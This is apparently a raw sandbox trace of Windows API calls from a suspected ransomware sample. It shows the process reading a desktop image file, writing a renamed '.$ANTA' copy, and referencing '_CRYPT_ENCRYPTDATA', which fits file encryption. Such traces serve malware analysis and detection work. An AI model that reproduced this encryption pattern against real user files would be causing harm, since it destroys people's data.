Flags=0x0, Size=0x8) returned 0x43e2920 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0128.631] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0128.632] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0128.632] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0128.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0128.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0128.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0128.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0128.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0128.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0128.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0128.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0128.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0128.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0128.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0128.632] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\_uPhYhD.png" (normalized: "c:\\users\\fd1hvy\\desktop\\_uphyhd.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0128.632] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.632] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0128.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0128.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0128.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0128.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0128.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0128.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0128.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0128.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0128.633] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0128.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0128.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0128.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0128.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0128.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0128.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0128.633] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0128.633] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0128.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0128.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0128.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0128.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0128.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0128.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0128.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0128.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0128.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0128.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0128.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0128.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0128.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0128.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0128.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0128.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0128.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0128.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0128.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0128.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0128.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0128.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0128.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0128.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0128.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921b8 [0128.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0128.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0128.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0128.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0128.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0128.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0128.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0128.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0128.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0128.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0128.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0128.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0128.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0128.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0128.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0128.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0128.635] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0128.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0128.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0128.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0128.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0128.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0128.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0128.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0128.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0128.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0128.635] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\_uPhYhD.png.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\_uphyhd.png.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0128.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0128.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0128.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0128.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0128.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0128.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0128.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0128.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.636] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0128.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0128.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0128.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0128.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0128.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0128.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0128.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0128.636] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0128.636] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0128.636] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0128.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0128.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0128.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0128.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0128.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0128.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0128.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0128.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0128.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0128.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0128.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0128.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0128.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x1b86020 [0128.640] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0128.640] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x3390, lpOverlapped=0x0) returned 1 [0128.641] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0128.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0128.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0128.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0128.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3390) returned 0x49aa010 [0128.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b86020 | out: hHeap=0x1780000) returned 1 [0128.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0128.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0128.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0128.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0128.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0128.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3390) returned 0x49ad3a8 [0128.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0128.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.644] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0128.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0128.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0128.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0128.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0128.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3390) returned 0x49aa010 [0128.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0128.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0128.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0128.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.644] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0128.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0128.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0128.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0128.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0128.645] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0128.645] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0128.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392110 | out: hHeap=0x1780000) returned 1 [0128.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2670 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3390) returned 0x49aa010 [0128.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0128.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0128.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0128.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0128.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3390) returned 0x49b0740 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0128.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0128.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0128.646] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 